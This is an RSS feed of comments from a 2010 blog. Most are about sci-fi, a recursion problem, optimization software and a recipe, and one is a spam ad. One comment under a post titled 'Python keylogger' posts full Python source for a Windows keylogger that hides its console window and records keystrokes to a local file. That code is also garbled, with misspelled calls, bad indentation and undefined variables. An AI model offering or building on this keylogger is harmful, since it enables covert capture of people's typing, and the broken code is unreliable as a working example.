<?xml version="1.0" encoding="utf-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for ChapterZero</title>
	<atom:link href="http://www.tangentspace.net/cz/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.tangentspace.net/cz</link>
	<description>somewhere near the beginning.</description>
	<lastBuildDate>Tue, 09 Mar 2010 11:23:12 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Comment on What makes for good Sci-fi? by Captain Rick</title>
		<link>http://www.tangentspace.net/cz/archives/2004/11/what-makes-for-good-sci-fi/comment-page-1/#comment-530021</link>
		<dc:creator>Captain Rick</dc:creator>
		<pubDate>Tue, 09 Mar 2010 11:23:12 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/archives/2004/11/what-makes-for-good-sci-fi#comment-530021</guid>
		<description>Cool spaceships!</description>
		<content:encoded><![CDATA[<p>Cool spaceships!</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Solve this nasty recursion by Alex</title>
		<link>http://www.tangentspace.net/cz/archives/2010/03/solve-this-nasty-recursion/comment-page-1/#comment-529869</link>
		<dc:creator>Alex</dc:creator>
		<pubDate>Mon, 08 Mar 2010 03:51:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1738#comment-529869</guid>
		<description>Hmmm. On sober reflection, this problem (and as the math wizard has pointed out, there&#039;s something wrong with the ICs) isn&#039;t likely to give me a usable solution, because the problem I &quot;reduced&quot; it from is a harder relative of the question of how many even partitions of an even integer are there, and that doesn&#039;t seem to have any closed form solutions.</description>
		<content:encoded><![CDATA[<p>Hmmm. On sober reflection, this problem (and as the math wizard has pointed out, there&#8217;s something wrong with the ICs) isn&#8217;t likely to give me a usable solution, because the problem I &#8220;reduced&#8221; it from is a harder relative of the question of how many even partitions of an even integer are there, and that doesn&#8217;t seem to have any closed form solutions.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Solve this nasty recursion by torus</title>
		<link>http://www.tangentspace.net/cz/archives/2010/03/solve-this-nasty-recursion/comment-page-1/#comment-529479</link>
		<dc:creator>torus</dc:creator>
		<pubDate>Sat, 06 Mar 2010 15:03:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1738#comment-529479</guid>
		<description>I would try some generating function technique. May be exponential generating function?</description>
		<content:encoded><![CDATA[<p>I would try some generating function technique. May be exponential generating function?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Solve this nasty recursion by Igor Carron</title>
		<link>http://www.tangentspace.net/cz/archives/2010/03/solve-this-nasty-recursion/comment-page-1/#comment-529232</link>
		<dc:creator>Igor Carron</dc:creator>
		<pubDate>Fri, 05 Mar 2010 12:47:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1738#comment-529232</guid>
		<description>Have you tried asking the question on math overflow ? (http://mathoverflow.net/)

Igor.
.-= Igor Carron´s last blog ..&lt;a href=&quot;http://nuit-blanche.blogspot.com/2010/03/cs-one-of-longest-entry.html&quot; rel=&quot;nofollow&quot;&gt;CS: One of the longest entry&lt;/a&gt; =-.</description>
		<content:encoded><![CDATA[<p>Have you tried asking the question on math overflow ? (<a href="http://mathoverflow.net/" rel="nofollow">http://mathoverflow.net/</a>)</p>
<p>Igor.<br />
<span class="cluv"> Igor Carron´s last blog ..<a href="http://nuit-blanche.blogspot.com/2010/03/cs-one-of-longest-entry.html" rel="nofollow">CS: One of the longest entry</a> <span class="heart_tip_box"><img class="heart_tip" alt="My ComLuv Profile" border="0" width="16" height="14" src="http://www.tangentspace.net/cz/wp-content/plugins/commentluv/images/littleheart.gif"/></span></span></p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Solve this nasty recursion by the math wizard</title>
		<link>http://www.tangentspace.net/cz/archives/2010/03/solve-this-nasty-recursion/comment-page-1/#comment-529212</link>
		<dc:creator>the math wizard</dc:creator>
		<pubDate>Fri, 05 Mar 2010 05:53:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1738#comment-529212</guid>
		<description>when m = 1, \Omega_{k,1} = sum of terms of \Omega_{?,0} = 0
when m = 2, \Omega_{k,2} = sum of terms of \Omega_{?,1} = 0
by induction \Omega{k,m} = 0 everywhere except k=0
nasty!</description>
		<content:encoded><![CDATA[<p>when m = 1, \Omega_{k,1} = sum of terms of \Omega_{?,0} = 0<br />
when m = 2, \Omega_{k,2} = sum of terms of \Omega_{?,1} = 0<br />
by induction \Omega{k,m} = 0 everywhere except k=0<br />
nasty!</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on CVXOPT + Pythonika = convex optimization from Mathematica by Alex</title>
		<link>http://www.tangentspace.net/cz/archives/2010/02/cvxopt-pythonika-convex-optimization-from-mathematica/comment-page-1/#comment-527996</link>
		<dc:creator>Alex</dc:creator>
		<pubDate>Sun, 28 Feb 2010 09:15:24 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1719#comment-527996</guid>
		<description>That sounds like a good idea.</description>
		<content:encoded><![CDATA[<p>That sounds like a good idea.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on CVXOPT + Pythonika = convex optimization from Mathematica by Stephen</title>
		<link>http://www.tangentspace.net/cz/archives/2010/02/cvxopt-pythonika-convex-optimization-from-mathematica/comment-page-1/#comment-527957</link>
		<dc:creator>Stephen</dc:creator>
		<pubDate>Sat, 27 Feb 2010 21:44:33 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1719#comment-527957</guid>
		<description>Alex, seems like a decent idea.  To become more &quot;cvx-like&quot;, you could try &lt;a href=&quot;http://cvxmod.net/&quot; rel=&quot;nofollow&quot;&gt;cvxmod&lt;/a&gt;, another product from Stephen Boyd&#039;s research group.  It&#039;s a wrapper to cvxopt, the same way that CVX is a wrapper to SeDuMi and SDPT3.</description>
		<content:encoded><![CDATA[<p>Alex, seems like a decent idea.  To become more &#8220;cvx-like&#8221;, you could try <a href="http://cvxmod.net/" rel="nofollow">cvxmod</a>, another product from Stephen Boyd&#8217;s research group.  It&#8217;s a wrapper to cvxopt, the same way that CVX is a wrapper to SeDuMi and SDPT3.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on My favorite tuna recipe by Hap</title>
		<link>http://www.tangentspace.net/cz/archives/2007/02/my-favorite-tuna-recipe/comment-page-1/#comment-527115</link>
		<dc:creator>Hap</dc:creator>
		<pubDate>Tue, 23 Feb 2010 19:44:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/archives/2007/02/my-favorite-tuna-recipe#comment-527115</guid>
		<description>OMG, you too have found the S-Bend! It is the very best hot sauce on Earth and I sure wish I could find a way to buy it without visiting Barbados.

If I had some S-Bend around, I&#039;d try this recipe straight away.</description>
		<content:encoded><![CDATA[<p>OMG, you too have found the S-Bend! It is the very best hot sauce on Earth and I sure wish I could find a way to buy it without visiting Barbados.</p>
<p>If I had some S-Bend around, I&#8217;d try this recipe straight away.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Python keylogger by rossjones</title>
		<link>http://www.tangentspace.net/cz/archives/2005/07/python-keylogger/comment-page-1/#comment-525564</link>
		<dc:creator>rossjones</dc:creator>
		<pubDate>Wed, 17 Feb 2010 01:00:43 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/archives/2005/07/python-keylogger#comment-525564</guid>
		<description>import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.getconsolewindow()
win32qui.showWindow(win.0)

def onKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)

        if event.ascii != 0 or 8:
            f=open(&#039;c:\output.txt&#039;,&#039;r&#039;)
            f.close()
            f=open(&#039;c:\output.txt&#039;,&#039;w&#039;)
            keylogs=chr(event.Ascii)
            if event.Ascii==13:
                keylogs=&#039;/n&#039;
            buffer += keylogs
            f.write(buffer)
            f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()</description>
		<content:encoded><![CDATA[<p>import win32api<br />
import win32console<br />
import win32gui</p>
<p>import pythoncom, pyHook</p>
<p>win = win32console.getconsolewindow()<br />
win32qui.showWindow(win.0)</p>
<p>def onKeyboardEvent(event):<br />
    if event.Ascii==5:<br />
        _exit(1)</p>
<p>        if event.ascii != 0 or 8:<br />
            f=open(&#8216;c:\output.txt&#8217;,'r&#8217;)<br />
            f.close()<br />
            f=open(&#8216;c:\output.txt&#8217;,'w&#8217;)<br />
            keylogs=chr(event.Ascii)<br />
            if event.Ascii==13:<br />
                keylogs=&#8217;/n&#8217;<br />
            buffer += keylogs<br />
            f.write(buffer)<br />
            f.close()</p>
<p>hm = pyHook.HookManager()<br />
hm.KeyDown = OnKeyboardEvent<br />
hm.HookKeyboard()<br />
pythoncom.PumpMessages()</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Paper management by Janet B</title>
		<link>http://www.tangentspace.net/cz/archives/2009/12/paper-management/comment-page-1/#comment-520456</link>
		<dc:creator>Janet B</dc:creator>
		<pubDate>Fri, 15 Jan 2010 17:57:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.tangentspace.net/cz/?p=1351#comment-520456</guid>
		<description>It looks like some of the issues you are encountering when you file could be solved by using software to keep track of your files. You can try The Paper Tiger Filing system to help you better keep track of your files. Give it a try! We are BBB A-Rated business and are always looking for ways to help people file!</description>
		<content:encoded><![CDATA[<p>It looks like some of the issues you are encountering when you file could be solved by using software to keep track of your files. You can try The Paper Tiger Filing system to help you better keep track of your files. Give it a try! We are BBB A-Rated business and are always looking for ways to help people file!</p>
]]></content:encoded>
	</item>
</channel>
</rss>
